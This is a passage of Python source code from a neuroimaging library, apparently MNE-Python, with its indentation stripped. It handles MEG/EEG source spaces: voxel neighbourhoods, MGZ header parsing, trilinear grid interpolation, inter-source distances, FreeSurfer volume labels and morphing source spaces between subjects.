assert len(sps) == len(volume_labels)
# This will undo some of the work above, but the calculations are
# pretty trivial so allow it
if single_volume:
for sp in sps[1:]:
sps[0]['inuse'][sp['vertno']] = True
sp = sps[0]
sp['seg_name'] = '+'.join(s['seg_name'] for s in sps)
sps = sps[:1]
sp['vertno'] = np.where(sp['inuse'])[0]
sp['nuse'] = len(sp['vertno'])
del sp, volume_labels
if not do_neighbors:
return sps
k = np.arange(npts)
neigh = np.empty((26, npts), int)
neigh.fill(-1)
# Figure out each neighborhood:
# 6-neighborhood first
idxs = [z > minn[2], x < maxn[0], y < maxn[1],
x > minn[0], y > minn[1], z < maxn[2]]
offsets = [-nplane, 1, nrow, -1, -nrow, nplane]
for n, idx, offset in zip(neigh[:6], idxs, offsets):
n[idx] = k[idx] + offset
# Then the rest to complete the 26-neighborhood
# First the plane below
idx1 = z > minn[2]
idx2 = np.logical_and(idx1, x < maxn[0])
neigh[6, idx2] = k[idx2] + 1 - nplane
idx3 = np.logical_and(idx2, y < maxn[1])
neigh[7, idx3] = k[idx3] + 1 + nrow - nplane
idx2 = np.logical_and(idx1, y < maxn[1])
neigh[8, idx2] = k[idx2] + nrow - nplane
idx2 = np.logical_and(idx1, x > minn[0])
idx3 = np.logical_and(idx2, y < maxn[1])
neigh[9, idx3] = k[idx3] - 1 + nrow - nplane
neigh[10, idx2] = k[idx2] - 1 - nplane
idx3 = np.logical_and(idx2, y > minn[1])
neigh[11, idx3] = k[idx3] - 1 - nrow - nplane
idx2 = np.logical_and(idx1, y > minn[1])
neigh[12, idx2] = k[idx2] - nrow - nplane
idx3 = np.logical_and(idx2, x < maxn[0])
neigh[13, idx3] = k[idx3] + 1 - nrow - nplane
# Then the same plane
idx1 = np.logical_and(x < maxn[0], y < maxn[1])
neigh[14, idx1] = k[idx1] + 1 + nrow
idx1 = x > minn[0]
idx2 = np.logical_and(idx1, y < maxn[1])
neigh[15, idx2] = k[idx2] - 1 + nrow
idx2 = np.logical_and(idx1, y > minn[1])
neigh[16, idx2] = k[idx2] - 1 - nrow
idx1 = np.logical_and(y > minn[1], x < maxn[0])
neigh[17, idx1] = k[idx1] + 1 - nrow - nplane
# Finally one plane above
idx1 = z < maxn[2]
idx2 = np.logical_and(idx1, x < maxn[0])
neigh[18, idx2] = k[idx2] + 1 + nplane
idx3 = np.logical_and(idx2, y < maxn[1])
neigh[19, idx3] = k[idx3] + 1 + nrow + nplane
idx2 = np.logical_and(idx1, y < maxn[1])
neigh[20, idx2] = k[idx2] + nrow + nplane
idx2 = np.logical_and(idx1, x > minn[0])
idx3 = np.logical_and(idx2, y < maxn[1])
neigh[21, idx3] = k[idx3] - 1 + nrow + nplane
neigh[22, idx2] = k[idx2] - 1 + nplane
idx3 = np.logical_and(idx2, y > minn[1])
neigh[23, idx3] = k[idx3] - 1 - nrow + nplane
idx2 = np.logical_and(idx1, y > minn[1])
neigh[24, idx2] = k[idx2] - nrow + nplane
idx3 = np.logical_and(idx2, x < maxn[0])
neigh[25, idx3] = k[idx3] + 1 - nrow + nplane
# Omit unused vertices from the neighborhoods
logger.info('Adjusting the neighborhood info.')
r0 = minn * grid
voxel_size = grid * np.ones(3)
ras = np.eye(3)
src_mri_t = _make_voxel_ras_trans(r0, ras, voxel_size)
neigh_orig = neigh
for sp in sps:
# remove non source-space points
neigh = neigh_orig.copy()
neigh[:, np.logical_not(sp['inuse'])] = -1
# remove these points from neigh
old_shape = neigh.shape
neigh = neigh.ravel()
checks = np.where(neigh >= 0)[0]
removes = np.logical_not(np.in1d(checks, sp['vertno']))
neigh[checks[removes]] = -1
neigh.shape = old_shape
neigh = neigh.T
# Thought we would need this, but C code keeps -1 vertices, so we will:
# neigh = [n[n >= 0] for n in enumerate(neigh[vertno])]
sp['neighbor_vert'] = neigh
# Set up the volume data (needed for creating the interpolation matrix)
sp['src_mri_t'] = src_mri_t
sp['vol_dims'] = maxn - minn + 1
for key in ('mri_width', 'mri_height', 'mri_depth', 'mri_volume_name',
'vox_mri_t', 'mri_ras_t'):
if key in vol_info:
sp[key] = vol_info[key]
_print_coord_trans(sps[0]['src_mri_t'], 'Source space : ')
for key in ('vox_mri_t', 'mri_ras_t'):
if key in sps[0]:
_print_coord_trans(sps[0][key], 'MRI volume : ')
return sps
def _vol_vertex(width, height, jj, kk, pp):
return jj + width * kk + pp * (width * height)
def _get_mgz_header(fname):
"""Adapted from nibabel to quickly extract header info."""
fname = _check_fname(fname, overwrite='read', must_exist=True,
name='MRI image')
if not fname.endswith('.mgz'):
raise IOError('Filename must end with .mgz')
header_dtd = [('version', '>i4'), ('dims', '>i4', (4,)),
('type', '>i4'), ('dof', '>i4'), ('goodRASFlag', '>i2'),
('delta', '>f4', (3,)), ('Mdc', '>f4', (3, 3)),
('Pxyz_c', '>f4', (3,))]
header_dtype = np.dtype(header_dtd)
with GzipFile(fname, 'rb') as fid:
hdr_str = fid.read(header_dtype.itemsize)
header = np.ndarray(shape=(), dtype=header_dtype,
buffer=hdr_str)
# dims
dims = header['dims'].astype(int)
dims = dims[:3] if len(dims) == 4 else dims
# vox2ras_tkr
delta = header['delta']
ds = np.array(delta, float)
ns = np.array(dims * ds) / 2.0
v2rtkr = np.array([[-ds[0], 0, 0, ns[0]],
[0, 0, ds[2], -ns[2]],
[0, -ds[1], 0, ns[1]],
[0, 0, 0, 1]], dtype=np.float32)
# ras2vox
d = np.diag(delta)
pcrs_c = dims / 2.0
Mdc = header['Mdc'].T
pxyz_0 = header['Pxyz_c'] - np.dot(Mdc, np.dot(d, pcrs_c))
M = np.eye(4, 4)
M[0:3, 0:3] = np.dot(Mdc, d)
M[0:3, 3] = pxyz_0.T
header = dict(dims=dims, vox2ras_tkr=v2rtkr, vox2ras=M,
zooms=header['delta'])
return header
def _src_vol_dims(s):
w, h, d = [s[f'mri_{key}'] for key in ('width', 'height', 'depth')]
return w, h, d, np.prod([w, h, d])
def _add_interpolator(sp):
"""Compute a sparse matrix to interpolate the data into an MRI volume."""
# extract transformation information from mri
from scipy import sparse
mri_width, mri_height, mri_depth, nvox = _src_vol_dims(sp[0])
#
# Convert MRI voxels from destination (MRI volume) to source (volume
# source space subset) coordinates
#
combo_trans = combine_transforms(sp[0]['vox_mri_t'],
invert_transform(sp[0]['src_mri_t']),
'mri_voxel', 'mri_voxel')
logger.info('Setting up volume interpolation ...')
inuse = np.zeros(sp[0]['np'], bool)
for s_ in sp:
np.logical_or(inuse, s_['inuse'], out=inuse)
interp = _grid_interp(
sp[0]['vol_dims'], (mri_width, mri_height, mri_depth),
combo_trans['trans'], order=1, inuse=inuse)
assert isinstance(interp, sparse.csr_matrix)
# Compose the sparse matrices
for si, s in enumerate(sp):
if len(sp) == 1: # no need to do these gymnastics
this_interp = interp
else: # limit it rows that have any contribution from inuse
# This is the same as the following, but more efficient:
# any_ = np.asarray(
# interp[:, s['inuse'].astype(bool)].sum(1)
# )[:, 0].astype(bool)
any_ = np.zeros(interp.indices.size + 1, np.int64)
any_[1:] = s['inuse'][interp.indices]
np.cumsum(any_, out=any_)
any_ = np.diff(any_[interp.indptr]) > 0
assert any_.shape == (interp.shape[0],)
indptr = np.empty_like(interp.indptr)
indptr[0] = 0
indptr[1:] = np.diff(interp.indptr)
indptr[1:][~any_] = 0
np.cumsum(indptr, out=indptr)
mask = np.repeat(any_, np.diff(interp.indptr))
indices = interp.indices[mask]
data = interp.data[mask]
assert data.shape == indices.shape == (indptr[-1],)
this_interp = sparse.csr_matrix(
(data, indices, indptr), shape=interp.shape)
s['interpolator'] = this_interp
logger.info(' %d/%d nonzero values for %s'
% (len(s['interpolator'].data), nvox, s['seg_name']))
logger.info('[done]')
def _grid_interp(from_shape, to_shape, trans, order=1, inuse=None):
"""Compute a grid-to-grid linear or nearest interpolation given."""
from scipy import sparse
from_shape = np.array(from_shape, int)
to_shape = np.array(to_shape, int)
trans = np.array(trans, np.float64) # to -> from
assert trans.shape == (4, 4) and np.array_equal(trans[3], [0, 0, 0, 1])
assert from_shape.shape == to_shape.shape == (3,)
shape = (np.prod(to_shape), np.prod(from_shape))
if inuse is None:
inuse = np.ones(shape[1], bool)
assert inuse.dtype == bool
assert inuse.shape == (shape[1],)
data, indices, indptr = _grid_interp_jit(
from_shape, to_shape, trans, order, inuse)
data = np.concatenate(data)
indices = np.concatenate(indices)
indptr = np.cumsum(indptr)
interp = sparse.csr_matrix((data, indices, indptr), shape=shape)
return interp
# This is all set up to do jit, but it's actually slower!
def _grid_interp_jit(from_shape, to_shape, trans, order, inuse):
# Loop over slices to save (lots of) memory
# Note that it is the slowest incrementing index
# This is equivalent to using mgrid and reshaping, but faster
assert order in (0, 1)
data = list()
indices = list()
nvox = np.prod(to_shape)
indptr = np.zeros(nvox + 1, np.int32)
mri_width, mri_height, mri_depth = to_shape
r0__ = np.empty((4, mri_height, mri_width), np.float64)
r0__[0, :, :] = np.arange(mri_width)
r0__[1, :, :] = np.arange(mri_height).reshape(1, mri_height, 1)
r0__[3, :, :] = 1
r0_ = np.reshape(r0__, (4, mri_width * mri_height))
width, height, _ = from_shape
trans = np.ascontiguousarray(trans)
maxs = (from_shape - 1).reshape(1, 3)
for p in range(mri_depth):
r0_[2] = p
# Transform our vertices from their MRI space into our source space's
# frame (this is labeled as FIFFV_MNE_COORD_MRI_VOXEL, but it's
# really a subset of the entire volume!)
r0 = (trans @ r0_)[:3].T
if order == 0:
rx = np.round(r0).astype(np.int32)
keep = np.where(np.logical_and(np.all(rx >= 0, axis=1),
np.all(rx <= maxs, axis=1)))[0]
indptr[keep + p * mri_height * mri_width + 1] = 1
indices.append(_vol_vertex(width, height, *rx[keep].T))
data.append(np.ones(len(keep)))
continue
rn = np.floor(r0).astype(np.int32)
good = np.where(np.logical_and(np.all(rn >= -1, axis=1),
np.all(rn <= maxs, axis=1)))[0]
if len(good) == 0:
continue
rns = rn[good]
r0s = r0[good]
jj_g, kk_g, pp_g = (rns >= 0).T
jjp1_g, kkp1_g, ppp1_g = (rns < maxs).T # same as rns + 1 <= maxs
# now we take each MRI voxel *in this space*, and figure out how
# to make its value the weighted sum of voxels in the volume source
# space. This is a trilinear interpolation based on the
# fact that we know we're interpolating from one volumetric grid
# into another.
jj = rns[:, 0]
kk = rns[:, 1]
pp = rns[:, 2]
vss = np.empty((len(jj), 8), np.int32)
jjp1 = jj + 1
kkp1 = kk + 1
ppp1 = pp + 1
mask = np.empty((len(jj), 8), bool)
vss[:, 0] = _vol_vertex(width, height, jj, kk, pp)
mask[:, 0] = jj_g & kk_g & pp_g
vss[:, 1] = _vol_vertex(width, height, jjp1, kk, pp)
mask[:, 1] = jjp1_g & kk_g & pp_g
vss[:, 2] = _vol_vertex(width, height, jjp1, kkp1, pp)
mask[:, 2] = jjp1_g & kkp1_g & pp_g
vss[:, 3] = _vol_vertex(width, height, jj, kkp1, pp)
mask[:, 3] = jj_g & kkp1_g & pp_g
vss[:, 4] = _vol_vertex(width, height, jj, kk, ppp1)
mask[:, 4] = jj_g & kk_g & ppp1_g
vss[:, 5] = _vol_vertex(width, height, jjp1, kk, ppp1)
mask[:, 5] = jjp1_g & kk_g & ppp1_g
vss[:, 6] = _vol_vertex(width, height, jjp1, kkp1, ppp1)
mask[:, 6] = jjp1_g & kkp1_g & ppp1_g
vss[:, 7] = _vol_vertex(width, height, jj, kkp1, ppp1)
mask[:, 7] = jj_g & kkp1_g & ppp1_g
# figure out weights for each vertex
xf = r0s[:, 0] - rns[:, 0].astype(np.float64)
yf = r0s[:, 1] - rns[:, 1].astype(np.float64)
zf = r0s[:, 2] - rns[:, 2].astype(np.float64)
omxf = 1.0 - xf
omyf = 1.0 - yf
omzf = 1.0 - zf
this_w = np.empty((len(good), 8), np.float64)
this_w[:, 0] = omxf * omyf * omzf
this_w[:, 1] = xf * omyf * omzf
this_w[:, 2] = xf * yf * omzf
this_w[:, 3] = omxf * yf * omzf
this_w[:, 4] = omxf * omyf * zf
this_w[:, 5] = xf * omyf * zf
this_w[:, 6] = xf * yf * zf
this_w[:, 7] = omxf * yf * zf
# eliminate zeros
mask[this_w <= 0] = False
# eliminate rows where none of inuse are actually present
row_mask = mask.copy()
row_mask[mask] = inuse[vss[mask]]
mask[~(row_mask.any(axis=-1))] = False
# construct the parts we need
indices.append(vss[mask])
indptr[good + p * mri_height * mri_width + 1] = mask.sum(1)
data.append(this_w[mask])
return data, indices, indptr
def _pts_in_hull(pts, hull, tolerance=1e-12):
return np.all([np.dot(eq[:-1], pts.T) + eq[-1] <= tolerance
for eq in hull.equations], axis=0)
@verbose
def _filter_source_spaces(surf, limit, mri_head_t, src, n_jobs=1,
verbose=None):
"""Remove all source space points closer than a given limit (in mm)."""
if src[0]['coord_frame'] == FIFF.FIFFV_COORD_HEAD and mri_head_t is None:
raise RuntimeError('Source spaces are in head coordinates and no '
'coordinate transform was provided!')
# How close are the source points to the surface?
out_str = 'Source spaces are in '
if src[0]['coord_frame'] == FIFF.FIFFV_COORD_HEAD:
inv_trans = invert_transform(mri_head_t)
out_str += 'head coordinates.'
elif src[0]['coord_frame'] == FIFF.FIFFV_COORD_MRI:
out_str += 'MRI coordinates.'
else:
out_str += 'unknown (%d) coordinates.' % src[0]['coord_frame']
logger.info(out_str)
out_str = 'Checking that the sources are inside the surface'
if limit > 0.0:
out_str += ' and at least %6.1f mm away' % (limit)
logger.info(out_str + ' (will take a few...)')
# fit a sphere to a surf quickly
check_inside = _CheckInside(surf)
# Check that the source is inside surface (often the inner skull)
for s in src:
vertno = np.where(s['inuse'])[0] # can't trust s['vertno'] this deep
# Convert all points here first to save time
r1s = s['rr'][vertno]
if s['coord_frame'] == FIFF.FIFFV_COORD_HEAD:
r1s = apply_trans(inv_trans['trans'], r1s)
inside = check_inside(r1s, n_jobs)
omit_outside = (~inside).sum()
# vectorized nearest using BallTree (or cdist)
omit_limit = 0
if limit > 0.0:
# only check "inside" points
idx = np.where(inside)[0]
check_r1s = r1s[idx]
if check_inside.inner_r is not None:
# ... and those that are at least inner_sphere + limit away
mask = (np.linalg.norm(check_r1s - check_inside.cm, axis=-1) >=
check_inside.inner_r - limit / 1000.)
idx = idx[mask]
check_r1s = check_r1s[mask]
dists = _compute_nearest(
surf['rr'], check_r1s, return_dists=True, method='cKDTree')[1]
close = (dists < limit / 1000.0)
omit_limit = np.sum(close)
inside[idx[close]] = False
s['inuse'][vertno[~inside]] = False
del vertno
s['nuse'] -= (omit_outside + omit_limit)
s['vertno'] = np.where(s['inuse'])[0]
if omit_outside > 0:
extras = [omit_outside]
extras += ['s', 'they are'] if omit_outside > 1 else ['', 'it is']
logger.info(' %d source space point%s omitted because %s '
'outside the inner skull surface.' % tuple(extras))
if omit_limit > 0:
extras = [omit_limit]
extras += ['s'] if omit_outside > 1 else ['']
extras += [limit]
logger.info(' %d source space point%s omitted because of the '
'%6.1f-mm distance limit.' % tuple(extras))
# Adjust the patch inds as well if necessary
if omit_limit + omit_outside > 0:
_adjust_patch_info(s)
@verbose
def _adjust_patch_info(s, verbose=None):
"""Adjust patch information in place after vertex omission."""
if s.get('patch_inds') is not None:
if s['nearest'] is None:
# This shouldn't happen, but if it does, we can probably come
# up with a more clever solution
raise RuntimeError('Cannot adjust patch information properly, '
'please contact the mne-python developers')
_add_patch_info(s)
@verbose
def _ensure_src(src, kind=None, extra='', verbose=None):
"""Ensure we have a source space."""
_check_option(
'kind', kind, (None, 'surface', 'volume', 'mixed', 'discrete'))
msg = 'src must be a string or instance of SourceSpaces%s' % (extra,)
if _check_path_like(src):
src = str(src)
if not op.isfile(src):
raise IOError('Source space file "%s" not found' % src)
logger.info('Reading %s...' % src)
src = read_source_spaces(src, verbose=False)
if not isinstance(src, SourceSpaces):
raise ValueError('%s, got %s (type %s)' % (msg, src, type(src)))
if kind is not None:
if src.kind != kind and src.kind == 'mixed':
if kind == 'surface':
src = src[:2]
elif kind == 'volume':
src = src[2:]
if src.kind != kind:
raise ValueError('Source space must contain %s type, got '
'%s' % (kind, src.kind))
return src
def _ensure_src_subject(src, subject):
src_subject = src._subject
if subject is None:
subject = src_subject
if subject is None:
raise ValueError('source space is too old, subject must be '
'provided')
elif src_subject is not None and subject != src_subject:
raise ValueError('Mismatch between provided subject "%s" and subject '
'name "%s" in the source space'
% (subject, src_subject))
return subject
_DIST_WARN_LIMIT = 10242 # warn for anything larger than ICO-5
@verbose
def add_source_space_distances(src, dist_limit=np.inf, n_jobs=1, verbose=None):
"""Compute inter-source distances along the cortical surface.
This function will also try to add patch info for the source space.
It will only occur if the ``dist_limit`` is sufficiently high that all
points on the surface are within ``dist_limit`` of a point in the
source space.
Parameters
----------
src : instance of SourceSpaces
The source spaces to compute distances for.
dist_limit : float
The upper limit of distances to include (in meters).
Note: if limit < np.inf, scipy > 0.13 (bleeding edge as of
10/2013) must be installed. If 0, then only patch (nearest vertex)
information is added.
%(n_jobs)s
Ignored if ``dist_limit==0.``.
%(verbose)s
Returns
-------
src : instance of SourceSpaces
The original source spaces, with distance information added.
The distances are stored in src[n]['dist'].
Note: this function operates in-place.
Notes
-----
This function can be memory- and CPU-intensive. On a high-end machine
(2012) running 6 jobs in parallel, an ico-5 (10242 per hemi) source space
takes about 10 minutes to compute all distances (``dist_limit = np.inf``).
With ``dist_limit = 0.007``, computing distances takes about 1 minute.
We recommend computing distances once per source space and then saving
the source space to disk, as the computed distances will automatically be
stored along with the source space data for future use.
"""
from scipy.sparse import csr_matrix
from scipy.sparse.csgraph import dijkstra
n_jobs = check_n_jobs(n_jobs)
src = _ensure_src(src)
dist_limit = float(dist_limit)
if dist_limit < 0:
raise ValueError('dist_limit must be non-negative, got %s'
% (dist_limit,))
patch_only = (dist_limit == 0)
if patch_only and not check_version('scipy', '1.3'):
raise RuntimeError('scipy >= 1.3 is required to calculate patch '
'information only, consider upgrading SciPy or '
'using dist_limit=np.inf when running '
'add_source_space_distances')
if src.kind != 'surface':
raise RuntimeError('Currently all source spaces must be of surface '
'type')
parallel, p_fun, _ = parallel_func(_do_src_distances, n_jobs)
min_dists = list()
min_idxs = list()
msg = 'patch information' if patch_only else 'source space distances'
logger.info('Calculating %s (limit=%s mm)...' % (msg, 1000 * dist_limit))
max_n = max(s['nuse'] for s in src)
if not patch_only and max_n > _DIST_WARN_LIMIT:
warn('Computing distances for %d source space points (in one '
'hemisphere) will be very slow, consider using add_dist=False'
% (max_n,))
for s in src:
adjacency = mesh_dist(s['tris'], s['rr'])
if patch_only:
min_dist, _, min_idx = dijkstra(
adjacency, indices=s['vertno'],
min_only=True, return_predecessors=True)
min_dists.append(min_dist.astype(np.float32))
min_idxs.append(min_idx)
for key in ('dist', 'dist_limit'):
s[key] = None
else:
d = parallel(p_fun(adjacency, s['vertno'], r, dist_limit)
for r in np.array_split(np.arange(len(s['vertno'])),
n_jobs))
# deal with indexing so we can add patch info
min_idx = np.array([dd[1] for dd in d])
min_dist = np.array([dd[2] for dd in d])
midx = np.argmin(min_dist, axis=0)
range_idx = np.arange(len(s['rr']))
min_dist = min_dist[midx, range_idx]
min_idx = min_idx[midx, range_idx]
min_dists.append(min_dist)
min_idxs.append(min_idx)
# convert to sparse representation
d = np.concatenate([dd[0] for dd in d]).ravel() # already float32
idx = d > 0
d = d[idx]
i, j = np.meshgrid(s['vertno'], s['vertno'])
i = i.ravel()[idx]
j = j.ravel()[idx]
s['dist'] = csr_matrix(
(d, (i, j)), shape=(s['np'], s['np']), dtype=np.float32)
s['dist_limit'] = np.array([dist_limit], np.float32)
# Let's see if our distance was sufficient to allow for patch info
if not any(np.any(np.isinf(md)) for md in min_dists):
# Patch info can be added!
for s, min_dist, min_idx in zip(src, min_dists, min_idxs):
s['nearest'] = min_idx
s['nearest_dist'] = min_dist
_add_patch_info(s)
else:
logger.info('Not adding patch information, dist_limit too small')
return src
def _do_src_distances(con, vertno, run_inds, limit):
"""Compute source space distances in chunks."""
from scipy.sparse.csgraph import dijkstra
func = partial(dijkstra, limit=limit)
chunk_size = 20 # save memory by chunking (only a little slower)
lims = np.r_[np.arange(0, len(run_inds), chunk_size), len(run_inds)]
n_chunks = len(lims) - 1
# eventually we want this in float32, so save memory by only storing 32-bit
d = np.empty((len(run_inds), len(vertno)), np.float32)
min_dist = np.empty((n_chunks, con.shape[0]))
min_idx = np.empty((n_chunks, con.shape[0]), np.int32)
range_idx = np.arange(con.shape[0])
for li, (l1, l2) in enumerate(zip(lims[:-1], lims[1:])):
idx = vertno[run_inds[l1:l2]]
out = func(con, indices=idx)
midx = np.argmin(out, axis=0)
min_idx[li] = idx[midx]
min_dist[li] = out[midx, range_idx]
d[l1:l2] = out[:, vertno]
midx = np.argmin(min_dist, axis=0)
min_dist = min_dist[midx, range_idx]
min_idx = min_idx[midx, range_idx]
d[d == np.inf] = 0 # scipy will give us np.inf for uncalc. distances
return d, min_idx, min_dist
def get_volume_labels_from_aseg(mgz_fname, return_colors=False,
atlas_ids=None):
"""Return a list of names and colors of segmented volumes.
Parameters
----------
mgz_fname : str
Filename to read. Typically aseg.mgz or some variant in the freesurfer
pipeline.
return_colors : bool
If True returns also the labels colors.
atlas_ids : dict | None
A lookup table providing a mapping from region names (str) to ID values
(int). Can be None to use the standard Freesurfer LUT.
.. versionadded:: 0.21.0
Returns
-------
label_names : list of str
The names of segmented volumes included in this mgz file.
label_colors : list of str
The RGB colors of the labels included in this mgz file.
See Also
--------
read_freesurfer_lut
Notes
-----
.. versionchanged:: 0.21.0
The label names are now sorted in the same order as their corresponding
values in the MRI file.
.. versionadded:: 0.9.0
"""
import nibabel as nib
atlas = nib.load(mgz_fname)
data = np.asarray(atlas.dataobj) # don't need float here
want = np.unique(data)
if atlas_ids is None:
atlas_ids, colors = read_freesurfer_lut()
elif return_colors:
raise ValueError('return_colors must be False if atlas_ids are '
'provided')
# restrict to the ones in the MRI, sorted by label name
keep = np.in1d(list(atlas_ids.values()), want)
keys = sorted((key for ki, key in enumerate(atlas_ids.keys()) if keep[ki]),
key=lambda x: atlas_ids[x])
if return_colors:
colors = [colors[k] for k in keys]
out = keys, colors
else:
out = keys
return out
# XXX this should probably be deprecated because it returns surface Labels,
# and probably isn't the way to go moving forward
# XXX this also assumes that the first two source spaces are surf without
# checking, which might not be the case (could be all volumes)
@fill_doc
def get_volume_labels_from_src(src, subject, subjects_dir):
"""Return a list of Label of segmented volumes included in the src space.
Parameters
----------
src : instance of SourceSpaces
The source space containing the volume regions.
%(subject)s
subjects_dir : str
Freesurfer folder of the subjects.
Returns
-------
labels_aseg : list of Label
List of Label of segmented volumes included in src space.
"""
from . import Label
from . import get_volume_labels_from_aseg
# Read the aseg file
aseg_fname = op.join(subjects_dir, subject, 'mri', 'aseg.mgz')
if not op.isfile(aseg_fname):
raise IOError('aseg file "%s" not found' % aseg_fname)
all_labels_aseg = get_volume_labels_from_aseg(
aseg_fname, return_colors=True)
# Create a list of Label
if len(src) < 2:
raise ValueError('No vol src space in src')
if any(np.any(s['type'] != 'vol') for s in src[2:]):
raise ValueError('source spaces have to be of vol type')
labels_aseg = list()
for nr in range(2, len(src)):
vertices = src[nr]['vertno']
pos = src[nr]['rr'][src[nr]['vertno'], :]
roi_str = src[nr]['seg_name']
try:
ind = all_labels_aseg[0].index(roi_str)
color = np.array(all_labels_aseg[1][ind]) / 255
except ValueError:
pass
if 'left' in roi_str.lower():
hemi = 'lh'
roi_str = roi_str.replace('Left-', '') + '-lh'
elif 'right' in roi_str.lower():
hemi = 'rh'
roi_str = roi_str.replace('Right-', '') + '-rh'
else:
hemi = 'both'
label = Label(vertices=vertices, pos=pos, hemi=hemi,
name=roi_str, color=color,
subject=subject)
labels_aseg.append(label)
return labels_aseg
def _get_hemi(s):
"""Get a hemisphere from a given source space."""
if s['type'] != 'surf':
raise RuntimeError('Only surface source spaces supported')
if s['id'] == FIFF.FIFFV_MNE_SURF_LEFT_HEMI:
return 'lh', 0, s['id']
elif s['id'] == FIFF.FIFFV_MNE_SURF_RIGHT_HEMI:
return 'rh', 1, s['id']
else:
raise ValueError('unknown surface ID %s' % s['id'])
def _get_vertex_map_nn(fro_src, subject_from, subject_to, hemi, subjects_dir,
to_neighbor_tri=None):
"""Get a nearest-neigbor vertex match for a given hemi src.
The to_neighbor_tri can optionally be passed in to avoid recomputation
if it's already available.
"""
# adapted from mne_make_source_space.c, knowing accurate=False (i.e.
# nearest-neighbor mode should be used)
logger.info('Mapping %s %s -> %s (nearest neighbor)...'
% (hemi, subject_from, subject_to))
regs = [op.join(subjects_dir, s, 'surf', '%s.sphere.reg' % hemi)
for s in (subject_from, subject_to)]
reg_fro, reg_to = [read_surface(r, return_dict=True)[-1] for r in regs]
if to_neighbor_tri is not None:
reg_to['neighbor_tri'] = to_neighbor_tri
if 'neighbor_tri' not in reg_to:
reg_to['neighbor_tri'] = _triangle_neighbors(reg_to['tris'],
reg_to['np'])
morph_inuse = np.zeros(len(reg_to['rr']), int)
best = np.zeros(fro_src['np'], int)
ones = _compute_nearest(reg_to['rr'], reg_fro['rr'][fro_src['vertno']])
for v, one in zip(fro_src['vertno'], ones):
# if it were actually a proper morph map, we would do this, but since
# we know it's nearest neighbor list, we don't need to:
# this_mm = mm[v]
# one = this_mm.indices[this_mm.data.argmax()]
if morph_inuse[one]:
# Try the nearest neighbors
neigh = _get_surf_neighbors(reg_to, one) # on demand calc
was = one
one = neigh[np.where(~morph_inuse[neigh])[0]]
if len(one) == 0:
raise RuntimeError('vertex %d would be used multiple times.'
% one)
one = one[0]
logger.info('Source space vertex moved from %d to %d because of '
'double occupation.' % (was, one))
best[v] = one
morph_inuse[one] = True
return best
@verbose
def morph_source_spaces(src_from, subject_to, surf='white', subject_from=None,
subjects_dir=None, verbose=None):
"""Morph an existing source space to a different subject.
.. warning:: This can be used in place of morphing source estimates for
multiple subjects, but there may be consequences in terms
of dipole topology.
Parameters
----------
src_from : instance of SourceSpaces
Surface source spaces to morph.
subject_to : str
The destination subject.
surf : str
The brain surface to use for the new source space.
subject_from : str | None
The "from" subject. For most source spaces this shouldn't need
to be provided, since it is stored in the source space itself.
subjects_dir : str | None
Path to SUBJECTS_DIR if it is not set in the environment.
%(verbose)s
Returns
-------
src : instance of SourceSpaces
The morphed source spaces.
Notes
-----
.. versionadded:: 0.10.0
"""
# adapted from mne_make_source_space.c
src_from = _ensure_src(src_from)
subject_from = _ensure_src_subject(src_from, subject_from)
subjects_dir = get_subjects_dir(subjects_dir, raise_error=True)
src_out = list()
for fro in src_from:
hemi, idx, id_ = _get_hemi(fro)
to = op.join(subjects_dir, subject_to, 'surf', '%s.%s' % (hemi, surf,))
logger.info('Reading destination surface %s' % (to,))
to = read_surface(to, return_dict=True, verbose=False)[-1]
complete_surface_info(to, copy=False)
# Now we morph the vertices to the destination
# The C code does something like this, but with a nearest-neighbor
# mapping instead of the weighted one::
#
# >>> mm = read_morph_map(subject_from, subject_to, subjects_dir)
#
# Here we use a direct NN calculation, since picking the max from the
# existing morph map (which naively one might expect to be equivalent)
# differs for ~3% of vertices.
best = _get_vertex_map_nn(fro, subject_from, subject_to, hemi,
subjects_dir, to['neighbor_tri'])
for key in ('neighbor_tri', 'tri_area', 'tri_cent', 'tri_nn',
'use_tris'):
del to[key]
to['vertno'] = np.sort(best[fro['vertno']])
to['inuse'] = np.zeros(len(to['rr']), int)
to['inuse'][to['vertno']] = True
to['use_tris'] = best[fro['use_tris']]
to.update(nuse=len(to['vertno']), nuse_tri=len(to['use_tris']),
nearest=None, nearest_dist=None, patch_inds=None, pinfo=None,
dist=None, id=id_, dist_limit=None, type='surf',
coord_frame=FIFF.FIFFV_COORD_MRI, subject_his_id=subject_to,
rr=to['rr'] / 1000.)
src_out.append(to)
logger.info('[done]\n')
info = dict(working_dir=os.getcwd(), command_line=_get_call_line())
return SourceSpaces(src_out, info=info)
@verbose
def _get_morph_src_reordering(vertices, src_from, subject_from, subject_to,
subjects_dir=None, verbose=None):
"""Get the reordering indices for a morphed source space.
Parameters
----------
vertices : list
The vertices for the left and right hemispheres.
src_from : instance of SourceSpaces
The original source space.
subject_from : str
The source subject.
subject_to : str
The destination subject.
%(subjects_dir)s
%(verbose)s
Returns
-------
data_idx : ndarray, shape (n_vertices,)
The array used to reshape the data.
from_vertices : list
The right and left hemisphere vertex numbers for the "from" subject.
"""
subjects_dir = get_subjects_dir(subjects_dir, raise_error=True)
from_vertices = list()
data_idxs = list()
offset = 0
for ii, hemi in enumerate(('lh', 'rh')):
# Get the mapping from the original source space to the destination
# subject's surface vertex numbers
best = _get_vertex_map_nn(src_from[ii], subject_from, subject_to,
hemi, subjects_dir)
full_mapping = best[src_from[ii]['vertno']]
# Tragically, we might not have all of our vertno left (e.g. because
# some are omitted during fwd calc), so we must do some indexing magic:
# From all vertices, a subset could be chosen by fwd calc:
used_vertices = np.in1d(full_mapping, vertices[ii])
from_vertices.append(src_from[ii]['vertno'][used_vertices])
remaining_mapping = full_mapping[used_vertices]
if not np.array_equal(np.sort(remaining_mapping), vertices[ii]) or \
not np.in1d(vertices[ii], full_mapping).all():
raise RuntimeError('Could not map vertices, perhaps the wrong '
'subject "%s" was provided?' % subject_from)
# And our data have been implicitly remapped by the forced ascending
# vertno order in source spaces
implicit_mapping = np.argsort(remaining_mapping) # happens to data
data_idx = np.argsort(implicit_mapping) # to reverse the mapping
data_idx += offset # hemisphere offset
data_idxs.append(data_idx)
offset += len(implicit_mapping)
data_idx = np.concatenate(data_idxs)
# this one is really just a sanity check for us, should never be violated
# by users
assert np.array_equal(np.sort(data_idx),
np.arange(sum(len(v) for v in vertices)))
return data_idx, from_vertices
def _compare_source_spaces(src0, src1, mode='exact', nearest=True,
dist_tol=1.5e-3):
"""Compare two source spaces.
Note: this function is also used by forward/tests/test_make_forward.py
"""
from numpy.testing import (assert_allclose, assert_array_equal,
